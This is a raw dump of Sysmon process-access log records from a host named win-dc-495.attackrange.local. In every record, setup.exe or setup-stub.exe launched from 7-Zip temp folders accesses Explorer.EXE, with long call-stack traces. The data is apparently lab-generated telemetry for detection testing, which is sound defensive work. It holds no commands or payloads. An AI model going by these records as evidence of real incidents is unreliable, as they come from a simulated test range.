13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 